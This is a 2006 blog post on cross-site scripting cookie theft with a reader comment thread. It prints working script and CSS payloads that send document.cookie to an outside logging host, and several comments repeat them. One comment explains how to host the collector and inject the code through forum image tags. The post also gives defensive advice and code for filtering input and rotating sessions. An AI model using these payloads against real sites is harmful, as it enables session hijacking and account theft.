XSS - Stealing Cookies 101

posted January 21st 2006 at 2042 EST in All, Javascript, Web, Security

Stealing cookies is easy. Never trust a client to be who you think it is. Just because it was trusted a few seconds ago doesn't mean it will be in a few seconds, ESPECIALLY if a cookie is all you use to identify a client.

A recent LiveJournal hack has brought this to light again. Back when MySpace was hacked in October, it reminded us that we must be vigilant in filtering the text users post, because a hacker could smuggle in some JavaScript code to use the site maliciously from the browsers of authenticated users.

By stealing a user's cookies, as the LiveJournal hack did, you don't even have to carry out the attack in the user's browser; you can do it elsewhere. Worst of all, stealing cookies is EASY TO DO, and HARD TO PROTECT AGAINST.

Easy to do?

<script>
new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);
</script>

That was it. If I can get that code onto a site where you are authenticated, I can become you.

In IE there is a second method as well: execute the JavaScript from CSS.

<style>
.getcookies{background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);');}
</style>
<p class="getcookies"></p>

Any time you let users post text and you don't religiously restrict the content, they can steal sessions. Scary? If you are a developer, it had better scare the hell out of you.
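As an added example (not from the post, and not the author's log.cgi), here is one way to let users post text with a limited [img] tag while keeping both payloads above inert: escape everything first, then re-enable only an image whose URL has an http or https scheme, so a javascript: URL like the one in the CSS variant is rejected. The host attacker.example, the [img] syntax and the sample posts are constructed for the demo.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample posts: the two payloads from the article (attacker host made up)
# and a harmless post that should still render its image.
SCRIPT_POST = ('<script>new Image().src="http://attacker.example/log.cgi?c="'
               '+encodeURI(document.cookie);</script>')
CSS_POST = ("[img]javascript:new Image().src='http://attacker.example/log.cgi?c='"
            "+encodeURI(document.cookie)[/img]")
BENIGN_POST = "look at this [img]http://example.com/cat.png[/img] and <b>bold</b>"

IMG_RE = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)


def safe_image_url(url):
    """Return a normalised URL only if it is absolute http(s); anything else
    (javascript:, data:, vbscript:, relative paths) is rejected with None."""
    parts = urlsplit(url.strip())  # urlsplit lower-cases the scheme for us
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    return parts.geturl()


def render_post(text):
    """Escape the whole post, then re-enable only a scheme-checked [img] tag.
    Everything the user typed as HTML or CSS stays inert text."""
    escaped = html.escape(text, quote=True)

    def replace_img(match):
        url = safe_image_url(html.unescape(match.group(1)))
        if url is None:
            return match.group(0)  # keep the literal (already escaped) text
        # Re-escape the URL so quotes inside it cannot close the attribute.
        return '<img src="%s" alt="">' % html.escape(url, quote=True)

    return IMG_RE.sub(replace_img, escaped)
```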

So, you might want to start believing every session is stolen. I didn't even try to obfuscate that. Start rolling your session ids from one value to another, and expire them at short intervals. Track the referrer, user agent, etc. Some of these changes don't add any real security, but they do add layers, and that always helps.
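One way to implement the rolling ids, short expiry and user-agent binding this paragraph recommends, as an added Python example that is not the author's code. The 15-minute idle timeout is an assumed value, and the HttpOnly cookie flag is an extra layer the post does not mention: it keeps the id out of document.cookie in browsers that honour it, though injected script can still act inside the victim's browser.

```python
import secrets
import time

SESSION_TTL = 15 * 60  # idle seconds before a session dies (assumed value)


class SessionStore:
    """In-memory table: session id -> (user, bound user agent, last seen)."""

    def __init__(self):
        self._sessions = {}

    def create(self, user, user_agent, now=None):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = (user, user_agent, time.time() if now is None else now)
        return sid

    def touch(self, sid, user_agent, now=None):
        """Validate a presented id. On success the old id is retired and a fresh
        one handed back, so a stolen id is only good until the victim's next
        request; a stale, expired or mismatched id is rejected (returns None)."""
        now = time.time() if now is None else now
        record = self._sessions.pop(sid, None)  # whatever happens, this id is spent
        if record is None:
            return None  # unknown or already rolled: log it as a possible replay
        user, bound_ua, last_seen = record
        if now - last_seen > SESSION_TTL:
            return None  # expired; do not revive it
        if user_agent != bound_ua:
            return None  # binding failed; session is gone for everyone, user logs in again
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = (user, bound_ua, now)
        return user, new_sid


def set_cookie_header(sid):
    """HttpOnly is a layer beyond the post: the browser withholds the cookie
    from document.cookie, so the image beacon shown earlier reads nothing."""
    return "Set-Cookie: sid=%s; Path=/; HttpOnly" % sid
```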

If you are not familiar with the MySpace XSS hack, read up. It's rich in detail.

If you want to view my server-side logging script log.cgi, check it out; it's just a simple Python CGI script that dumps the cookies to a text file.

21 Responses

  1. #1 Qex
    2 years, 9 months ago

    Can you please put the log.cgi on the site, nice Topic.

  2. #2 jehiah
    2 years, 9 months ago

    Thanks for the comment; I originally intended to, but clearly forgot. I’ve updated the page above with a link.

  3. #3 Hacker
    2 years, 8 months ago

    What CHMOD should I give it ?

  4. #4 aidan
    2 years, 6 months ago

how do you steal cookies

  5. […] XSS - Stealing Cookies 101 “Any time you let users post text and you don’t religiously restrict the content, they can steal sessions. Scarry? If you are a developer it better scare the hell out of you.” Not only scarry, but scary too. Oi! (tags: security javascript cookies xss programming) […]

  6. #6 mas
    2 years, 3 months ago

nice info .. but i want to know how to steal cookies .. i know the IP address of a computer, but in a different country …

  7. […] 5.1 Information theft Stealing Cookies, login credentials, banking information etc. http://jehiah.com/archive/xss-stealing-cookies-101 […]

  8. #8 Joshua Giese
    2 years, 2 months ago

sweet tutorial. it is surprising how many sites don't filter user input as they should. With everyone having blogs, and posting comments on social community websites, I'm sure that these kinds of attacks will be on the rise. Thanks for posting this.

  9. #9 Thoomas
    1 year, 6 months ago

new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);

    That would work then?

  10. #10 THomas11!!0
    1 year, 6 months ago

new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);

  11. #11 rugman
    1 year, 5 months ago

Thoomas, I believe you’ve got to get the user's browser to execute that link.

    One way to do this is to add that in forums [img] tags!

    OH AND TO THE OWNER OF THIS WEB SITE:

Dude, BLUEberrys are what color? that’s the first time I’ve seen this sort of auth system. Pretty nice, and would be pretty darn easy to implement too. Get a few more obvious Q’s and randomize them each time. hee hee.

  12. #12 Anonymous
    1 year, 3 months ago

alert('foo');

  13. #13 margie
    1 year, 1 month ago

    OK, this is great, but if it was in English so I could understand it…
Sorry, but some of us are computer illiterate in a lot of ways. Can you tell me the simplest way, in the simplest terms, how to prevent phishing? Many people don’t even know the word phish, and it seems to me that those of us who aren’t “in the know” are the root of the way these things are spread. If you can explain it to me and I can do it, I can pass it on to all my friends, who can send it to their friends, and away we go.
    Thanks so much for your time!!

  14. #14 meeeeeeeeeeee
    1 year, 1 month ago

    erm BBcode???

  15. #15 base_slash
    1 year, 1 month ago

where do the cookies go, or where do you see them?

  16. #16 noky
    10 months ago

Can the server-side log.cgi file be uploaded on a free server like geocities.com?
where will i get the cookies? i mean the result file, where it will be.. how to view it

  17. #17 NEWFAG
    6 months, 1 week ago

.getcookies{background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);');}

    AMIDOINGITRITE?

  18. #18 Anonymous
    5 months, 4 weeks ago

alert("lawl")

  19. #19 Chaos Creator
    5 months, 2 weeks ago

    Excellent tutorial. I can’t believe some of the comments on here, though. Apparently, people want to send you all of the cookies they intend to capture using this method. Jeez. People, you have to copy the log.cgi file to your own server, then provide the link as:

new Image().src="http://www.YOURDOMAIN.WHATEVER/log.cgi?c="+encodeURI(document.cookie);

    Next, you add your personalized version of this link and insert it into whatever website you’re trying to snarf the cookies from. If it’s a forum, you would use the [img][/img] BBCode.
    There are many types of XSS exploits like this. Do more research, folks.

  20. #20 Newbie
    5 months, 1 week ago

    ok after i post
new Image().src="http://www.YOURDOMAIN.WHATEVER/log.cgi?c="+encodeURI(document.cookie);

    and i have the log.cgi uploaded whats next?

  21. #21 XSS test
    4 weeks ago

    Simple XSS test.. just curious
